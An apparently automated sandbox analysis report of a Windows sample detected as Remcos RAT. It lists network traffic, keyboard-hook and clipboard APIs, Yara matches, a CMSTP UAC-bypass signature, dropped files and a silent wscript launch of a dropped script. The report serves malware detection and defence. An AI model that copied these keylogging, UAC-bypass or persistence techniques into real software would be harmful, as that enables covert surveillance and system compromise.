                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 69.49.234.173:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 74.220.219.13:443 -> 192.168.2.5:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.5:49819 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426601 SetWindowsHookExW 0000000D,0041ED8B,00000000,000000000_2_00426601
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00434323 OpenClipboard,GetClipboardData,CopyImage,CloseClipboard,0_2_00434323
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004346D7 __EH_prolog,Sleep,GetObjectW,GetBitmapBits,MessageBoxW,MessageBoxW,DeleteObject,CreateDIBSection,DeleteObject,SetBitmapBits,Sleep,Sleep,OpenClipboard,OpenClipboard,EmptyClipboard,CloseClipboard,Sleep,OpenClipboard,CopyImage,SetClipboardData,CloseClipboard,0_2_004346D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_004159C6
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001FF5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_001FF5B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00434323 OpenClipboard,GetClipboardData,CopyImage,CloseClipboard,0_2_00434323
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004324DC IsWindow,GetKeyboardState,GetKeyboardState,keybd_event,keybd_event,SetForegroundWindow,GetKeyboardState,keybd_event,0_2_004324DC
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_00219B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00219B7E
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041BB77 SystemParametersInfoW,4_2_0041BB77

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    .NET source code contains very large array initializations
                    Source: 0.2.file.exe.49eb26.1.raw.unpack, MapperVisitorQueue.csLarge array initialization: CloneDic: array initializer size 586080
                    Drops large PE files
                    Source: C:\Users\user\Desktop\file.exeFile dump: QuickTextPaste.exe.0.dr 979567349Jump to dropped file
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Wscript called in batch mode (surpress errors)
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041606E NtQueryDefaultLocale,0_2_0041606E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417015 NtQueryDefaultLocale,SendMessageW,0_2_00417015
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160C4 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004160C4
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0E3 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D0E3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0F2 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D0F2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416080 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416080
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416087 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416087
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416086 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416086
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D095 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D095
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416163 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416163
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041617F NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0041617F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416139 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416139
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D197 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D197
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D19C NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D19C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D1A2 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D1A2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041627C NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0041627C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D216 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D216
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416218 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00416218
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041622D NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0041622D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D22D NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D22D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162D3 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004162D3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D2D8 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D2D8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162AE NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004162AE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D308 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D308
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D30D NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040D30D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004173C2 NtQueryDefaultLocale,SendMessageW,0_2_004173C2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004153C9 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004153C9
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041647A NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0041647A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004174F6 NtQueryDefaultLocale,SendMessageW,0_2_004174F6
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417545 NtQueryDefaultLocale,SendMessageW,0_2_00417545
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417507 NtQueryDefaultLocale,SendMessageW,0_2_00417507
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417645 NtQueryDefaultLocale,SendMessageW,0_2_00417645
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041763C NtQueryDefaultLocale,SendMessageW,0_2_0041763C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156D2 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004156D2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417686 NtQueryDefaultLocale,SendMessageW,0_2_00417686
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041776A NtQueryDefaultLocale,SendMessageW,0_2_0041776A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041770A NtQueryDefaultLocale,SendMessageW,0_2_0041770A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415714 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415714
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004177D2 NtQueryDefaultLocale,SendMessageW,0_2_004177D2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004177A1 NtQueryDefaultLocale,SendMessageW,0_2_004177A1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004177B0 NtQueryDefaultLocale,SendMessageW,0_2_004177B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417870 NtQueryDefaultLocale,SendMessageW,0_2_00417870
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041783E NtQueryDefaultLocale,SendMessageW,0_2_0041783E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004178F1 NtQueryDefaultLocale,SendMessageW,0_2_004178F1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417895 NtQueryDefaultLocale,SendMessageW,0_2_00417895
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004159EC NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_004159EC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A4F NtQueryDefaultLocale,SendMessageW,0_2_00417A4F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A35 NtQueryDefaultLocale,SendMessageW,0_2_00417A35
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415AE0 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415AE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415A86 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415A86
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A96 NtQueryDefaultLocale,SendMessageW,0_2_00417A96
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415AAE NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415AAE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B61 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415B61
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B05 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415B05
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415CBA NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415CBA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415D06 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415D06
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415EBF NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415EBF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415F53 NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_00415F53
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416FC7 NtQueryDefaultLocale,SendMessageW,0_2_00416FC7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CFCF NtQueryDefaultLocale,GetDlgItem,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,0_2_0040CFCF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416F99 NtQueryDefaultLocale,SendMessageW,0_2_00416F99
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F4635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,23_2_001F4635
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E1A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,23_2_001E1A7B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_004158B9
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,5_2_00403883
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001EF0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_001EF0CD
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\AspnetPullJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\BerlinEaseJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\MalesMotorsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\BernardSamplesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\EvaluationsVitaminsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile created: C:\Windows\LecturesGenerationsJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004170150_2_00417015
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F0630_2_0040F063
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050700_2_00405070
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004180020_2_00418002
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040801F0_2_0040801F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004010340_2_00401034
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160C40_2_004160C4
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004060CD0_2_004060CD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004140D10_2_004140D1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0E30_2_0040D0E3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0F20_2_0040D0F2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004130FD0_2_004130FD
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160800_2_00416080
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160870_2_00416087
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004160860_2_00416086
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0950_2_0040D095
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004180940_2_00418094
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004180B80_2_004180B8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E1560_2_0040E156
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004161630_2_00416163
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041617F0_2_0041617F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004061000_2_00406100
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F1060_2_0040F106
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040610F0_2_0040610F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041812B0_2_0041812B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004131320_2_00413132
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004131370_2_00413137
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004161390_2_00416139
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A1FF0_2_0041A1FF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B1910_2_0040B191
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D1970_2_0040D197
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D19C0_2_0040D19C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D1A20_2_0040D1A2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062470_2_00406247
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040626C0_2_0040626C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041627C0_2_0041627C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062150_2_00406215
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D2160_2_0040D216
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162180_2_00416218
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041221A0_2_0041221A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041321C0_2_0041321C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041221F0_2_0041221F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004052230_2_00405223
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B2240_2_0040B224
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041622D0_2_0041622D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D22D0_2_0040D22D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B23D0_2_0040B23D
